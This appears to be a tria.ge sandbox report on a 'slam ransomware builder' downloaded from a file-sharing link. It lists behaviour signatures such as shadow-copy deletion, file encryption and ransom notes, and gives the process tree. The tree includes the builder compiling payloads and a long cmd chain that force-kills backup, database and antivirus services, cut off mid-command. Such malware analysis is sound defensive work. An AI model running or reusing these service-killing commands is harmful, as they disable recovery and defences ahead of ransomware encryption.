Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
18/10/2022, 01:25
221018-btf3lsebgp 118/10/2022, 01:23
221018-bsbfqsdhf5 117/10/2022, 09:00
221017-kyevsabca2 917/10/2022, 09:00
221017-kyaaasbbh7 117/10/2022, 08:48
221017-kqj5jabbd6 817/10/2022, 08:37
221017-kjge3abcer 8Analysis
-
max time kernel
1109s -
max time network
1092s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
17/10/2022, 09:00
General
-
Target
http://we.tl/t-7si6bGYMbk
Score
9/10
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
-
Executes dropped EXE 17 IoCs
-
Modifies Windows Firewall 1 TTPs 15 IoCs
-
Modifies extensions of user files 51 IoCs
Ransomware generally changes the extension on encrypted files.
-
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 12 IoCs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Drops desktop.ini file(s) 37 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 64 IoCs
-
Modifies registry class 45 IoCs
-
Modifies registry key 1 TTPs 6 IoCs
-
NTFS ADS 1 IoCs
-
Opens file in notepad (likely ransom note) 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 28 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start shell:Appsfolder\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge http://we.tl/t-7si6bGYMbk1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-redirect=Windows.Launch http://we.tl/t-7si6bGYMbk1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffd2da646f8,0x7ffd2da64708,0x7ffd2da647182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5260 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6844 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4108 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7428 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3864 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x200,0x22c,0x7ff68b2e5460,0x7ff68b2e5470,0x7ff68b2e54803⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3864 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8072 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7776 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6928 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3140 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3204 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7524 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7672 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3192 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5140 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5344 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,299128831923054676,9776370368131608043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7324 /prefetch:82⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\slam ransomware builder installer.exe"C:\Users\Admin\Downloads\slam ransomware builder installer.exe"1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\Desktop & del /Q /F slam_ransomware_builder.url & taskkill /F /IM slam.exe & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM slam.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\Desktop & del /Q /F slam_ransomware_builder.url & exit2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start C:\slam_ransomware_builder\start.exe & exit2⤵
-
C:\slam_ransomware_builder\start.exeC:\slam_ransomware_builder\start.exe3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1C0A.tmp\start.bat" C:\slam_ransomware_builder\start.exe"4⤵
-
C:\slam_ransomware_builder\slam.exeslam.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c MSBuild.exe ConsoleApp2\ConsoleApp2.sln6⤵
-
C:\slam_ransomware_builder\MSBuild.exeMSBuild.exe ConsoleApp2\ConsoleApp2.sln7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmpef589db2b8f34484bac53aecdab70e41.rsp"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E2A.tmp" "c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\CSCD198785FB2504C91BFF44B5EC6E2A6C2.TMP"9⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA31C.tmp" "c:\slam_ransomware_builder\CSCD10D7D88FCAF4379901E645B95E47F3.TMP"8⤵
-
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\slambuilder_temp\comandos.txt6⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c MSBuild.exe ConsoleApp2\ConsoleApp2.sln6⤵
-
C:\slam_ransomware_builder\MSBuild.exeMSBuild.exe ConsoleApp2\ConsoleApp2.sln7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmpdfc9a5fe942143a084899dcc962d641e.rsp"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB97.tmp" "c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\CSC7827E3BA5F974209827E5906DE2718B.TMP"9⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE18.tmp" "c:\slam_ransomware_builder\CSCB22C4E6D527412A9E9242B050877F2.TMP"8⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c MSBuild.exe ConsoleApp2\ConsoleApp2.sln6⤵
-
C:\slam_ransomware_builder\MSBuild.exeMSBuild.exe ConsoleApp2\ConsoleApp2.sln7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmp1d42a46f786c4218a071cc79694a6163.rsp"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES28AA.tmp" "c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\CSCA366C5C362D42B0924088FCD71FE3.TMP"9⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2C25.tmp" "c:\slam_ransomware_builder\CSC3B7837623FBC44AB8A7377B994478A61.TMP"8⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c MSBuild.exe ConsoleApp2\ConsoleApp2.sln6⤵
-
C:\slam_ransomware_builder\MSBuild.exeMSBuild.exe ConsoleApp2\ConsoleApp2.sln7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tmpfcb808baacaa409ba4469e4a812b7d41.rsp"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1667.tmp" "c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\CSC2C0F49EE1A72453CAC58384D24DAF8A1.TMP"9⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:Decrypter.exe src.cs /win32manifest:App.config7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES18F7.tmp" "c:\slam_ransomware_builder\CSC5231B9A7980C471CBCDA822CA89C667.TMP"8⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM server_connect.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM server_connect.exe7⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\Desktop & del /Q /F slam_ransomware_builder.url & exit2⤵
-
-
C:\slam_ransomware_builder\test.exe"C:\slam_ransomware_builder\test.exe"1⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
-
-
C:\slam_ransomware_builder\test.exe"C:\slam_ransomware_builder\test.exe"1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\slam_ransomware_builder\test1.exe"C:\slam_ransomware_builder\test1.exe"1⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\slam_ransomware_builder\test.exe"C:\slam_ransomware_builder\test.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill 